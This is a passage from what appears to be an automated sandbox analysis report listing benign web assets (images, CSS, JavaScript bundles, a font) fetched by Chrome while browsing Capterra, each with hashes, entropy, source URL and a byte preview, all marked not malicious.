                                                                                                                                                                                                        MD5:DD6CF6492222CC1424A5A59A1863F317
                                                                                                                                                                                                        SHA1:CE3B3C9EA65B182C9C72BD8DBE1818B99CF2790A
                                                                                                                                                                                                        SHA-256:31EBFA3D052EFC17B7370BA79484CDFE463E639252170591888B25F05CCFFBA6
                                                                                                                                                                                                        SHA-512:4DCBBFD00DA0E0087E76DDE6C9B548B0DA6F1C54BC5B34C4EC12F87C6638AB517FD9BE42512355F28640A98078CA25E23E3E1111839155877AC696DFB18AC9BE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR... ... .....D.......sRGB........"PLTEGpL3.S.H;..Q.D7.J;F..B..4.RB...@@.F9.R@.E7.I@.E7.E8...G..:.Y.. .*'C..7.N....3-D.....4.SA..4.S3.UB..4.SC...$!.(&.)%C......C6..*..@.7....C?.A7.X35.Td...# X~....:.........E).JV:.Q`..Y.Y.Y9..Y5.SX.N.C:#.T.......(%@.`...D...@*...4.T.*'....%".W..!..../.......T....2....C5B..4.SC..5.T...."..D6.C54.SB...@5....D6.&!.A3.D5.!..# .......S2.D5.S2." 5.UD...'".A4.!.."........T2.@5.&"6..C...?(. .....A4.;]ps..C0D...U1...B6..U3...".5.S..F.............c.6.V..........".@....T.# ..:=.........O....1.S$.S<...+...T~..!..8[rv.8...*7...&.T6.T...V.N..H..........V.<.Y....tRNS..y..E...........vv(V...(.V....x..y.=...E.......=.v........v..........no........................................................................................................Ay'.....IDAT8.c`...\ST.........t5.RV.B..R..vv...|f..e...k.d7.N...d.e....k."......f.... ..i%,Lpk...*+....... .....<.y..........@...5. .....`kXyS#.sA.6m...V.X0.. "..IP..%#..`.!@...._.R.../ ....R0a
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):144
                                                                                                                                                                                                        Entropy (8bit):4.726392709939282
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:OUwhw3imR92dOsUZNRfTRVdYSkF/M0RAXUwhw3imRJxDNRfSFd1n:wKBo1yR7RoSkFgKBTR01n
                                                                                                                                                                                                        MD5:6733A62E1A4EBDE36D0137F4658E2446
                                                                                                                                                                                                        SHA1:3AC39AEBFEC680B60A85121290DEDF896072A454
                                                                                                                                                                                                        SHA-256:D4B4AF9B5D66E57125CE31EAB6A0156DFA4E70B8BA9727105A570C1A40663B76
                                                                                                                                                                                                        SHA-512:E20A208CA88E3AF5774BA119DC87F129E2E19044CA592C25A5CAB5C3AE3A7B14DCC88446AAFC6BAB901F661D040FC4FC05865E14E6806368AC465A0D381C8475
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/css/a4a58254eecf0029.css
                                                                                                                                                                                                        Preview:.capterra-header_header-box__3Ne2_{z-index:80;top:0;min-height:64px}@media(min-width:768px){.capterra-header_header-box__3Ne2_{min-height:72px}}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):24
                                                                                                                                                                                                        Entropy (8bit):2.459147917027245
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                                        MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                                        SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                                        SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                                        SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.......,..........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):75961
                                                                                                                                                                                                        Entropy (8bit):5.284364477342943
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:QsOblXdRFlP6SupyNG6jtspnJWuUTzHUBDnBIuqoci+4cW/mK5NtUO6PnUZHBO8n:QDvFlP6Supyqpcu23O/ziSO87QRi8k
                                                                                                                                                                                                        MD5:6D77A76055D81227033363AF2F18CAF8
                                                                                                                                                                                                        SHA1:B1B94517954F8F8889A0822886DEA6F5AD7C931F
                                                                                                                                                                                                        SHA-256:19473EEBFB0672867A4438E2A015DE79FDED34B9F5AE5598BADE57EB01CF0563
                                                                                                                                                                                                        SHA-512:8E576150D0CB1FCB21DA5EC65C73EE2CB2E48A5F762C3926243471CAE4D0334F4D5B464A08C189A223E8E56D47C28323EFA4A053405D06BF35776C5154762FC7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[20],{"11Hm":function(e,t,n){"use strict";function _extends(){return(_extends=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(e[o]=n[o])}return e}).apply(this,arguments)}var o=n("QS52"),r=(n("c58o"),n("h7FZ"));function addLeadingSlash(e){return"/"===e.charAt(0)?e:"/"+e}function stripBasename(e,t){return function hasBasename(e,t){return new RegExp("^"+t+"(\\/|\\?|#|$)","i").test(e)}(e,t)?e.substr(t.length):e}function stripTrailingSlash(e){return"/"===e.charAt(e.length-1)?e.slice(0,-1):e}function createPath(e){var t=e.pathname,n=e.search,o=e.hash,r=t||"/";return n&&"?"!==n&&(r+="?"===n.charAt(0)?n:"?"+n),o&&"#"!==o&&(r+="#"===o.charAt(0)?o:"#"+o),r}function createLocation(e,t,n,r){var i;"string"===typeof e?(i=function parsePath(e){var t=e||"/",n="",o="",r=t.indexOf("#");-1!==r&&(o=t.substr(r),t=t.substr(0,r));var i=t.indexOf("?");return-1!==i&&(
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4486
                                                                                                                                                                                                        Entropy (8bit):7.928215380496798
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:o9NGg+58aBka0fD241XgUkdgidFTnrERJvGFhG8l4zHDepMeiAW:o+aHa0aoXIvno1iQBj
                                                                                                                                                                                                        MD5:F07C1BA5C32C7899092F9DF02143DCA6
                                                                                                                                                                                                        SHA1:90AE3281AAA378C4A3467BB21B29100AD6728036
                                                                                                                                                                                                        SHA-256:CAFE26AE85C7FB97B477A5F34DD9198F98CA6DFBE91F878ABB1F963757674162
                                                                                                                                                                                                        SHA-512:0B986D554B008CC4D716A5F34186E5F5BA48F2829CAC9EA0A36520F7373EB29824020B706AA7849441789DF41F11993D6A80F852F80E2F3182C10C58E99C081D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.............sRGB........@IDATx^.yt.u....;...;.,..."..'.."."..Agp....9.\..83......g.Tt.3..e.T..2*....... ;.......].{.....S...E..9u8I.N..w...[...!.H.......m...&..m...&..m...&..m...&..m...&..m...&..m...&..m...&..m...&..m...&..m...&..mBA..UAT.Q.G... .a.z~\..ndz....t..An.f.@.....Q.....l9...* *.O@.........j..N....`..%,....|^.e[...`...........!....]....u..\..Yh 4..OWb..|.%.....B....eE..0b.F...`q.~.....m......qUk\r.............._......bP.\..mr.$.inhj.-D.....>^.}.Pt..8...x....n.. .....7.m.\.B.&6n.KK.x..!.0L..x.'F.E.Nh.C.....NU`..X......$..S...@.,.2......W..'O.o...j.>EETX..V.9.7^.....\G.8y..v .s.}'M...).....\..W..E...\.<D.L../.......,.."..b.......R$D...M#...l.B..+...j..":.i.....h... .....K....'n...C.mu#...5....- ..$..........#..<.7...@..L*..`.n:-....(.Y..........G..0M.#.D,.....M.v..K.`.Z..@PQ...^x......$.a..x.C.....NE.-.S.D.v.....:...q"(.z+2T..@.....=:R...G.X_.qspZ...........2.z.....j.....7.:K6L......o....U......E..._4L.)C0
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4391
                                                                                                                                                                                                        Entropy (8bit):7.198351973326673
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+0jNc5N26MT0D5MdtbZPAVwzVHl+cguI9s4esDZ4:+0BcoYNMtKw/5xws4L4
                                                                                                                                                                                                        MD5:B8D1B21B30C5626CE33426F40A98EC09
                                                                                                                                                                                                        SHA1:A60B8D070FBF028F71947899CF28789C15CA441C
                                                                                                                                                                                                        SHA-256:8985C742318E107DAD64A1A78118376619673DEE14444918A49170A3673F3909
                                                                                                                                                                                                        SHA-512:993EFF4562B907C136E0811DF22395F942E4AEF7C0DB9D0901C1AA79214789C9454B79C064B2639D49B2DC0E9D83EB7CBAF59BEF6640C311D09118E6B474B2D1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/df25f33b-71a1-46b2-8520-02d04ac23097.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o.......(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9283
                                                                                                                                                                                                        Entropy (8bit):3.806105909665875
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:sjFpQzHwGAD7rLb2xzQyAme+5vedMYrlLCF4azcthiVD1ZaO:sjj/GgrLqx0yVh5WlWOnthiZp
                                                                                                                                                                                                        MD5:ABA2EEED5A7A027E738C534B39F81FD8
                                                                                                                                                                                                        SHA1:69C03E4E51D37FBB1EEB98BB4639E3D024E900E2
                                                                                                                                                                                                        SHA-256:B754F2F5012D19DFDACF148845C8CC7E41D5F5AA6F6656E4AC4D1F748DD8A150
                                                                                                                                                                                                        SHA-512:5347BF1F36DA25D4FE8A542FCE324D5D38A6952BCAD18167CAD70FD479E19B801F0CB415AA19B47CC57C6FE808F9A0A0AB05902186350482F1B297E84E42D4D7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<svg viewBox="0 0 1500 344.983" xmlns="http://www.w3.org/2000/svg"><path d="m8.905 127.38 135.181.027 82.199.014v-81.434z" fill="#ff9d28"/><path d="m226.285 45.987v287.503l102.665-325.956z" fill="#68c5ed"/><path d="m226.285 127.421-82.199-.014 82.199 206.083z" fill="#044d80"/><path d="m8.905 127.38 156.26 52.905-21.079-52.878z" fill="#e54747"/><path d="m506.884 257.809c-1.192 1.192-3.178 2.679-5.955 4.465-2.782 1.788-6.402 3.574-10.868 5.362-4.466 1.784-9.928 3.32-16.376 4.615-6.454 1.287-13.845 1.934-22.182 1.934-16.08 0-29.976-2.582-41.686-7.74-11.715-5.158-21.391-12.359-29.031-21.587-7.643-9.231-13.249-20.146-16.822-32.754-3.573-12.604-5.359-26.448-5.359-41.536 0-15.082 1.935-29.03 5.806-41.833 3.87-12.804 9.676-23.866 17.417-33.2 7.742-9.327 17.419-16.623 29.032-21.885 11.612-5.256 25.257-7.89 40.94-7.89 7.742 0 14.739.697 20.992 2.084 6.253 1.39 11.71 3.029 16.377 4.913 4.661 1.889 8.533 3.87 11.612 5.955 3.075 2.084 5.407 3.825 6.998 5.21 1.786 1.592 3.322 3.476 4.615 5.657 1.289
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4371
                                                                                                                                                                                                        Entropy (8bit):7.946371895116348
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:oRqhXrRBMeagzPbZlAmcf2UjRSUq1xXebasFHQ0U4JGux:oQROgPbjUzOsw0l
                                                                                                                                                                                                        MD5:8D2484E5D4C1C5755B7EA687DDFD976D
                                                                                                                                                                                                        SHA1:F8D8E57C843EA7E68CB4EB248EF48FB92FB3A793
                                                                                                                                                                                                        SHA-256:E6B6182E8A4DB6E119526142692700C3F2A9285764C842051B54EAD15131CEC4
                                                                                                                                                                                                        SHA-512:EF473596F568C31EEA7F8516AB9FB744208C2BF948884B20C58F120E703B9BD47A480CB01B17B21BDBB1B9803727890C8CF973C127EB37AC8C3161399C4EBD0D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.............sRGB.........IDATx^.y...}...s..K..4..d.G.8.8...q-+HP;QQ....hZ.i..Q.q..H.p..9.'..va7V.$v.D..@Q..dY+Y.jwg.........W......j8...(......?.~..#9...M-....4.8j.vIM.....%5A..&h.....]R..Kj.vIM.....%5A..&h.....]R..K..$.2........-.s..s.T..._e...R2...?\/<....#...u.f...4..u.P..22..P.G.y...{.Fy8.....g..)...{.......{Z=n..).@..v..}...M.j....y..)7.].[.rC.5.5(SE5...$k.m.J....>..K^.k.m[F5...K..k....YE..=..[..g.gu...Yc.Q&..l..Ll....d!.c......;..[l....3....L.....{..2.{l.....X..u.=.....{....z.b...iIvm.....Y......`.....Yu....>....C.y.........d..Y?....1\....5.BD.........i.....s.r.v..-...^..B..+....H......3.'.....2....?f?...k.9i..O...9.A.....-.......^........h:.=ui........h.._X}{....).d2.....J^Y...X~..".."{..h@....X..2 .........Bb.n..B...BX...F.@kG..Dq.......>...G..)..ha.`%aD.....X... ...".l_=..;(*c......h..Pk.....~...!T..s.S......[....,.E.f%.%.i.{]C.6 ....n..U.<..B.n.c..]....5S..R#....W.m..2,.h.....,{....J}....H...]..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (34474)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):59852
                                                                                                                                                                                                        Entropy (8bit):5.383826580536156
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:yrbtCnNxFEuCytGbtCn1x1EIC0DkTVBdl28t9If/kIL6rNDZlfHgDC1z/UF4VN:stKGtSvITVXlP0/9GrB3Hp1bUF4X
                                                                                                                                                                                                        MD5:0251956725D0D16860A49D1A7ACA1831
                                                                                                                                                                                                        SHA1:33A3CD51A0FB6639E9A36F08A8FD26953BEE69B7
                                                                                                                                                                                                        SHA-256:4345EF5A82ADD26BF12CA5240EB9F2B5D018AC14C4D02CF972CBB9BC8828C0FB
                                                                                                                                                                                                        SHA-512:DF91F7FD9BAFBD500B70A23E7281BEB6C91D6D38A657E87D0A6AA452C5061CD38CB87AFDB0609BE7031809ED8F0F9B27E83169392DEC7672A1E762FE76AE151E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4823],{38458:function(t,e,r){"use strict";r.d(e,{S1:function(){return m},qP:function(){return d},vP:function(){return w}});var n,o,i=r(20455),u=r(46385).lW;function a(t){return(a="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t})(t)}function f(t,e){var r=Object.keys(t);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(t);e&&(n=n.filter(function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable})),r.push.apply(r,n)}return r}function c(t){for(var e=1;e<arguments.length;e++){var r=null!=arguments[e]?arguments[e]:{};e%2?f(Object(r),!0).forEach(function(e){s(t,e,r[e])}):Object.getOwnPropertyDescriptors?Object.defineProperties(t,Object.getOwnPropertyDescriptors(r)):f(Object(r)).forEach(function(e){Object.defineProperty(t,e,Object.getOwnPropertyDescriptor(r,e))}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 24408, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):24408
                                                                                                                                                                                                        Entropy (8bit):7.9925104649213425
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:384:lwfLHrvMt+iWkciwtprblXNenWbFrqBY34OlZDsnNBvlUg0/qxFul2sOgZl06t2b:6bjU6PflXNHFrZJLDsT+gpx59cS6t2b
                                                                                                                                                                                                        MD5:EFEE2D080D7BEBDD2E0AEB2E030813A0
                                                                                                                                                                                                        SHA1:F8D38F9F9584E48C2E469877EBD94232265585F1
                                                                                                                                                                                                        SHA-256:BCA1D88ADA544D9C80872D4DA27133FAB6D347361FA26E932B47EC9559088FD0
                                                                                                                                                                                                        SHA-512:16C55AD46A26E0AF340F2B8A89BD98C1CCAD5C976B434AAFA7D1D8CD5049B40A58C5350FA42029710C9DD8040E7CEA05E57979731B941086CA096239169F4F3C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHjxsAXC-q.woff2
                                                                                                                                                                                                        Preview:wOF2......_X..........^...........................H.p.`..D....e.....t..o..B..6.$..v. .....E.K...%.E.. >.t1.`......<........%r.y.%.@g..L..^.n..>j?.Ve...~.U............Im.-...3..S....).K.....l..m6.D.hv.;.'~%v.a.D>...Se...i..Z........O....gv.(.$.2IDT...2.q.`.6..i`..&...J.H..*.*FcD..,...".[?.~...B.c...<T..<.r..s..D.....&c.@...i\.........[Z.h.....8.1............-.h.u......=.a.Y`..P....HP.r.....V2..D.xJu.....S.m..gr5/@v.>8.]......RW......z.A....am..z...(.4...i....&.Zd......u.{G3...H......[...$..o[.-.../]....d....Q....x..Q.o..Y,...8.i-...!..Fn]N.....D_..q...n..)&..).......x&.r:.D....d.M.m..6....M.V.....n.....h.l(?..8 d../.v.......>..ED$...B..e.T.Q.Jh.........=......'n..LH...UX.......JW..J..d...-Gp..ncuR.$\.&.......H.p..t....*.....lw9,.......?.|g....{ed.C"e....f..OvPXE..i.t*.K.x<x0!.cj........miy...kb.........jd.\{...E......n>.vj;...U.D.b..a4..\H.$........A.....*..vl..IH..!. J3\Nm............l.....?t..#CO.......^...\.......w...`'.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4820
                                                                                                                                                                                                        Entropy (8bit):7.291401790859098
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+0jqc5N26MT0D5MdtbZPAVwzVHlQOYeyKsUAhVC:+0OcoYNMtKw/QO4hc
                                                                                                                                                                                                        MD5:D16DDFA4BB79937FDB98C8727673DB30
                                                                                                                                                                                                        SHA1:6FD781FD726783B21DBD8724D4D243B412C7C263
                                                                                                                                                                                                        SHA-256:97A801B5C9BA420AC5F2C5FAAC004B30682185FF62E6EBE056D7069EC7E77A90
                                                                                                                                                                                                        SHA-512:6C7A21866D53A39756FE501C6525DBE2CA96FD6AA2FD345E609B346E181196B71C6CE2FA6B81D98E0700D996610284C0680B777A595C504E1C6901679CE41D51
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/7af09000-3e24-45a2-815f-7ccb9c0dcc7e.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o...e...(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4661
                                                                                                                                                                                                        Entropy (8bit):7.264034138208161
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+0j6c5N26MT0D5MdtbZPAVwzVHlDyV0S7ZNEo1VdkT:+0ecoYNMtKw/O+S7Z2SHW
                                                                                                                                                                                                        MD5:8AD81480CB0CFFA8CADF7CCD8E54C2F3
                                                                                                                                                                                                        SHA1:B5CB7D2F67B2324E315BB8EFA3FEBA973CC28FBD
                                                                                                                                                                                                        SHA-256:2AD5D5F094A06AD7207416DFE11746F6AD339E05241E31A76614BCA29C41923C
                                                                                                                                                                                                        SHA-512:A8DD53A0D6F47408C840E16B54BC7065415E381884BCFF6EAE6D86431D8B85DF836D1FBB6381CDCA18091A8A13C499FB3D20ADD1FB109B56D253E33A5F3283F3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/98ca9b83-b6bd-4a44-92d1-63c526d17630.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o.......(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (20666), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):20666
                                                                                                                                                                                                        Entropy (8bit):5.41690031771457
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:fpoJFbxLOTGfSLQ4SVVkNSW3pp8w5c/SsYNOqH7vZMfUpJAi4fNAHMYvavQsSTz5:hobxLOTGfBt/SOSTZM4JcVsTzDzoko0D
                                                                                                                                                                                                        MD5:1200A42843993DEC74B309E4B1A1CBAB
                                                                                                                                                                                                        SHA1:B2DABC739119677FD09BC1DDCA44BD30D1395625
                                                                                                                                                                                                        SHA-256:960F55236483F3BCD2CEE59E0C46A42022851BBDF80F35CE5D652DC9FB771197
                                                                                                                                                                                                        SHA-512:EE96A376F628BAF8EEEC389BDB7F8FC4BCF26B9C40C592BA1030EF072514D5DCA7EC5F0765612B36DB22D436E3D2307957FD66D085D3ADDF6701A43DC636A9EC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://assets.getalvis.com/alvis-onboard-1.0.8.js
                                                                                                                                                                                                        Preview:!function(e){var n={};function t(i){if(n[i])return n[i].exports;var c=n[i]={i:i,l:!1,exports:{}};return e[i].call(c.exports,c,c.exports,t),c.l=!0,c.exports}t.m=e,t.c=n,t.d=function(e,n,i){t.o(e,n)||Object.defineProperty(e,n,{enumerable:!0,get:i})},t.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},t.t=function(e,n){if(1&n&&(e=t(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.__esModule)return e;var i=Object.create(null);if(t.r(i),Object.defineProperty(i,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var c in e)t.d(i,c,function(n){return e[n]}.bind(null,c));return i},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,n){return Object.prototype.hasOwnProperty.call(e,n)},t.p="",t(t.s=2)}([function(e,n,t){"use strict";function i(e){return null==e}function c(e){return i(e)||e i
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4574
                                                                                                                                                                                                        Entropy (8bit):7.247089350061069
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+0jHc5N26MT0D5MdtbZPAVwzVHlWd+lhiWy2aW:+0rcoYNMtKw/WdCiWy2aW
                                                                                                                                                                                                        MD5:CE119DC19295BF667F3A0A0709C7E151
                                                                                                                                                                                                        SHA1:ADC659352B464FBE6C88762FDA5DEC2410652B8B
                                                                                                                                                                                                        SHA-256:44C22CFA0499E6AE0F2E8C52DDBE6641A8B8D408CA6334B08B464F9D08E96230
                                                                                                                                                                                                        SHA-512:B3E3FB2A99C657A8DBE95B98007F03788E20B2EF245553CE25CA98E2CE22E8D637FB4F55811460EF1684385577D527573DF372A85DDBAADB6D769E9D62977443
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/4e2671a7-72b7-4638-9434-190c249607a3.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o...o...(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):27
                                                                                                                                                                                                        Entropy (8bit):3.8841550945958048
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Y/p5KDETqLLMd:Y/p5iLMd
                                                                                                                                                                                                        MD5:745D81AE7E75E5CE474511997FFF10F0
                                                                                                                                                                                                        SHA1:C40B85B4D98D3F96CECB4DD525F8AC7B82596A3E
                                                                                                                                                                                                        SHA-256:FFEDCA701C91E9D65E6FC734CF847C45DA2878B25BAB2EB4EF053829FDCB0D27
